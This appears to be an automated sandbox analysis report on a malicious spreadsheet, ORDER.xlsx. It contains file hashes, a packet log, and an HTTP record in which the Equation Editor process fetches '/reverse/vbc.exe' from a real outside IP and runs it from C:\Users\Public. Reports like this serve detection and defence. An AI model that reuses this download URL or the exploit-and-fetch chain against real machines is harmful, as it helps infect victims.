SSDEEP:	3072:Uig2P/gdml1DDkiWgc/MLo6Ot57sOilam+hiwIYo4tdfF5oj:UwHgdQvkhgWM86Yhilam+hiwIYo4tdtc
MD5:	4E7BC50BF6D2B8EF86A4C4926E049AD9
SHA1:	F5C4808765D3157BE4E56890370BD65877C3E056
SHA-256:	EC482DE17E558209134FCBCA7223336509A9023AC929A666A597BF91DBAC339E
SHA-512:	F5AD28B1511E6DB884206FA069CEE11A792F24FE57B244D0F3E052BE6094BAFED2F5AF716DA3511D67C62B023D67840A57A7012AF96363D161648DED57918728
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L......J............................p.............@..........................P.......7......................................d...(.......:;..................................................................8... .......$............................text...4........................... ..`.data...dE..........................@....rsrc...:;.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.988313299891975
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	ORDER.xlsx
File size:	601624
MD5:	c82cca02226f7910cd552124c3cf6e7f
SHA1:	79214e25d81860d25a8e88df99d487394c029da1
SHA256:	5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
SHA512:	40319442ab5d27f4a91ec782e583e0d482ae407fa3f0600a396dd40f0d48a2116bbd9a2dfa521575f521f3ed5a0d629c1e0ab32a172c17c8e196add30a215581
SSDEEP:	12288:4+k0bkLVWS+a6i+N9OJ9D44qTIaI76wxAM45cBBHJJwM:41z5WdiKQB576v1cB9v
File Content Preview:	........................>.......................................................................................{..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 12:13:58.261023998 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.291210890 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.291331053 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.291750908 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.333020926 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.333060980 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.333086967 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.333111048 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.333132029 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.333159924 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364684105 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364721060 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364743948 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364763975 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364785910 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364785910 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364806890 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364825964 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364876032 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364881039 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364885092 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364887953 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364892006 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364895105 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.364903927 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.364959002 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.386749029 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.393924952 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.393950939 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.393964052 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.393976927 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.393992901 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394025087 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394042969 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394046068 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394061089 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394079924 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394085884 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394094944 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394114017 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394129038 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394144058 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394157887 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394175053 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394177914 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394196987 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394212008 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394224882 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394231081 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394247055 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394260883 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394277096 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394440889 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394458055 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.394484043 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.394503117 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.418894053 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.423641920 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423729897 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423774004 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423820019 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423862934 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423901081 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.423984051 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424017906 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424123049 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424132109 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424132109 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424175024 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424184084 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424196005 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424236059 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424246073 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424280882 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424299955 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424341917 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424349070 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424393892 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424396038 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424432039 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424438000 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424473047 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424480915 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424515963 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424525976 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424560070 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424573898 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424608946 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424609900 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424643993 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424654961 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424688101 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424704075 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424741030 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424751043 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424786091 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424794912 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424832106 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424843073 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424880981 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424881935 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424913883 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424928904 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.424962997 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.424974918 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425014019 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425033092 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425071955 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425076962 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425111055 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425111055 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425143957 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425147057 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425179005 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425184011 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425218105 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.425230026 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.425263882 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.426592112 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.453836918 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453876972 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453891039 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453905106 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453919888 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453933954 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453952074 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453969002 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.453988075 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454005003 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454026937 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454046965 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454065084 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454082012 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454099894 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454117060 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454134941 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454148054 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454161882 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454178095 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454199076 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454217911 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454238892 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454258919 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454278946 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454298019 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.454319954 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.454365015 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.455199003 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456135988 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456156969 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456173897 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456192017 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456208944 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456222057 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456224918 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456243038 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456259012 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456259966 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456279993 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456296921 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456296921 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456314087 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456331968 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456331015 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456347942 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456363916 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456366062 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456381083 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456394911 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 14, 2021 12:13:58.456403017 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.456448078 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:58.468563080 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 14, 2021 12:13:59.081495047 CEST	49165	80	192.168.2.22	212.192.246.25

HTTP Request Dependency Graph

212.192.246.25

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	212.192.246.25	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 12:13:58.291750908 CEST	0	OUT	GET /reverse/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 212.192.246.25 Connection: Keep-Alive
Sep 14, 2021 12:13:58.333020926 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 14 Sep 2021 10:13:58 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 13 Sep 2021 22:47:50 GMT ETag: "21000-5cbe84130fcf7" Accept-Ranges: bytes Content-Length: 135168 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 95 b4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 c3 37 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b9 01 00 28 00 00 00 00 10 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 ae 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELJp@P7d(:;8 $.text4 `.datadE@.rsrc:;@@@IMSVBVM60.DLL
Sep 14, 2021 12:13:58.333060980 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:13:58.333086967 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:13:58.333111048 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:13:58.364684105 CEST	7	IN	Data Raw: 00 00 00 00 01 00 00 00 00 00 a0 ca fc 02 48 41 41 4e 44 46 55 4c 44 45 4e 53 00 08 41 00 00 00 00 00 ff cc 31 00 07 fc 15 71 36 85 6b 78 44 85 2a e9 3c d3 d1 47 a5 ea 85 55 64 4d e5 e6 42 b7 73 a7 99 0b 9e 35 98 3a 4f ad 33 99 66 cf 11 b7 0c 00 Data Ascii: HAANDFULDENSA1q6kxD*<GUdMBs5:O3f`wMSTRANDSKADERSOPHUGGEDESB$OPHUGGEDES5'DFList1x(Che
Sep 14, 2021 12:13:58.364721060 CEST	8	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 28 19 40 00 01 00 00 00 e4 32 40 00 00 00 00 00 28 19 40 00 01 00 00 00 30 19 40 00 00 00 00 00 2c 19 40 00 01 00 00 00 30 19 40 00 00 00 b7 01 68 00 6c 00 58 19 40 00 3c e9 41 00 00 00 00 00 b0 ff 34 00 f4 32 Data Ascii: (@2@(@0@,@0@hlX@<A42@3@@4-@X@t1-@0@@X@^@d@
Sep 14, 2021 12:13:58.364743948 CEST	10	IN	Data Raw: 00 00 50 00 35 00 74 33 40 00 84 33 40 00 40 00 1f 00 34 00 00 00 ec 2d 40 00 ff ff ff ff 00 00 00 00 00 00 00 00 48 1e 40 00 b8 74 31 00 fc 2d 40 00 ff ff ff ff 00 00 00 00 20 1e 40 00 a0 1d 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 Data Ascii: P5t3@3@@4-@H@t1-@ @@X@^@d@P*@,A+@As3
Sep 14, 2021 12:13:58.364763975 CEST	11	IN	Data Raw: 67 62 e3 46 ad 41 cb 17 82 a0 63 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 00 00 00 00 00 00 00 54 34 40 00 3c 01 00 00 50 00 00 00 46 70 75 48 13 20 Data Ascii: gbFAcZT4@<PFpuH E`w)hO6@PdhGy7@P+F
Sep 14, 2021 12:13:58.364785910 CEST	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 26 40 00 24 25 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: D&@$%@X@^@d@l&@$%@X@^@d@&@$%@X@^@d@
Sep 14, 2021 12:13:58.364806890 CEST	14	IN	Data Raw: 00 00 00 00 06 00 00 00 09 00 00 00 7c 2d 40 00 b8 2d 40 00 10 c6 41 00 00 00 00 00 00 00 00 00 b8 53 31 00 46 72 61 6d 65 31 00 00 3a 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 46 6f 72 6d 00 00 00 00 12 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 Data Ascii: \|-@-@AS1Frame1:O3f`FormO3f`List1Frame3N3f`Check1Check2Check3UnpliabilityCHAIRMANNINGdommerkomiteers\Wscript.shell4:4:
Sep 14, 2021 12:13:58.364825964 CEST	15	IN	Data Raw: e3 46 ad 41 cb 17 82 a0 63 5a 73 1a cd 2a 72 8d b9 46 9e 03 c9 68 66 81 e1 76 38 ad a0 df 91 c8 72 42 8c 31 5d 63 4a 9d a1 dc 15 21 c4 77 15 63 60 44 82 df 8f b1 c0 5b 55 d3 46 70 75 48 13 20 91 45 a1 60 77 29 68 4f 90 14 c1 7b b9 19 45 30 37 4e Data Ascii: FAcZsrFhfv8rB1]cJ!wc`D[UFpuH E`w)hO{E07NUBX5Es$9BtdhGyMd.Be%0ccDiaxDkH\|{+FC=BVvytF41-C/H^QPN@

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2024 Parent PID: 596

General

Start time:	12:13:21
Start date:	14/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa90000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2644 Parent PID: 596

General

Start time:	12:13:43
Start date:	14/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 984 Parent PID: 2644

General

Start time:	12:13:46
Start date:	14/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	4E7BC50BF6D2B8EF86A4C4926E049AD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
